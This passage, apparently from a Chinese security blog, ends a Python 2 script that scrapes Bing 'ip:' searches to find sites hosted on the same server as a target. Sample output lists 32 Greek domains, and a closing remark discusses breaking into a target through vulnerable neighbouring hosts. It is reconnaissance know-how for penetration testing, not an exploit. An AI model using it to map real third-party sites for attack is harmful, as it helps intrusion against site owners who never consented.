        inflated = decompress.decompress(response.read())
        inflated += decompress.flush()
        return inflated

    return response.read()

def request_www_bing_com(response, requests, sharedTarget):
    response[0] = None
    try:
        req = urllib2.Request("http://www.bing.com/search?q=ip%3A"+str(sharedTarget)+"&first="+str(requests))

        req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0")
        req.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
        req.add_header("Accept-Language", "en-US,en;q=0.5")
        req.add_header("Accept-Encoding", "gzip, deflate")
        req.add_header("Referer", "http://www.bing.com/")
        req.add_header("Cookie", "_EDGE_V=1; MUID=1A8733283AE36E853EB935873BA66FEF; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=DF63C8A66FB64714818DCF4DFC12DEE1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20140908; MUIDB=1A8733283AE36E853EB935873BA66FEF; SRCHHPGUSR=CW=1280&CH=887; _RwBf=s=70&o=16; _HOP=; _SS=SID=BCC8BCA1D49C412281A16C56834A77B5&bIm=819187; SCRHDN=ASD=0&DURL=#; WLS=TS=63547515929")
        req.add_header("Connection", "keep-alive")

        response[0] = urllib2.urlopen(req)

    except urllib2.URLError, e:
        if not hasattr(e, "code"):
            return False
        response[0] = e
    except:
        return False

    return True

print '\n[*] Scanning for shared hosts. Please wait...'
print '------------------------------------------------'
if validateHostIP(sharedHost) == 'IP':
    make_requests(sharedHost)
elif validateHostIP(sharedHost) == 'HOSTNAME':
    make_requests(resolve(sharedHost))
else:
    print 'Something went wrong. Try again.'
print '------------------------------------------------'
print '[*] '+str(len(duplicateCheckList))+' unique domains found and verified to be on the same server.'

This script is OS agnostic. Takes one param, HOSTNAME or IP of the target. For example...

python neighbs.py www.green-apple.gr

or

python neighbs.py 176.9.145.29

For any libs that are missing, use pip to install.

C:\tools\Projects\PYTHON>python neighbs.py www.green-apple.gr

[*] Scanning for shared hosts. Please wait...
------------------------------------------------
[+] www.restozorba.be
[+] www.hotelmelissa.gr
[+] www.epiplotexan.gr
[+] www.n-everalone.com
[+] www.proedriki-froura.gr
[+] www.zpalace.gr
[+] www.green-apple.gr
[+] www.ktelxanthis.gr
[+] www.foititisweb.gr
[+] www.hotelnessos.gr
[+] www.tosteki.gr
[+] www.gashome.gr
[+] www.raptopoulos-stores.gr
[+] www.ksxanthi.gr
[+] www.olang.gr
[+] www.promoaction.gr
[+] www.kokkalas.co.gr
[+] www.inside.com.gr
[+] www.makka.gr
[+] www.christospoulios.gr
[+] www.outsis.gr
[+] www.velkopoulosgas.gr
[+] www.carnivalxanthi.gr
[+] www.serrespress.gr
[+] www.mpatsakis.gr
[+] www.moumtzaki.gr
[+] www.kopsidas.com.gr
[+] pse.co.gr
[+] www.krista.gr
[+] www.findgas.gr
[+] www.ippokratiskamaridis.gr
[+] www.vion.gr
------------------------------------------------
[*] 32 unique domains found and verified to be on the same server.

C:\tools\Projects\PYTHON>

Penetrating in to target machines by using shared hosts' vulnerabilities is not always legal even if you have a signed contract with the target. Make sure the shared hosts you're attacking belong to the same person/company before doing anything stupid.

分类
最新文章
最近回复
  • 轨迹: niubility!
  • 没穿底裤: 好办法..
  • emma: 任务计划那有点小问题,调用后Activation.exe不是当前活动窗口,造成回车下一步下一步...
  • 没穿底裤: hook execve函数
  • tuhao lam: 大佬,还有持续跟进Linux命令执行记录这块吗?通过内核拦截exec系统调用的方式,目前有没有...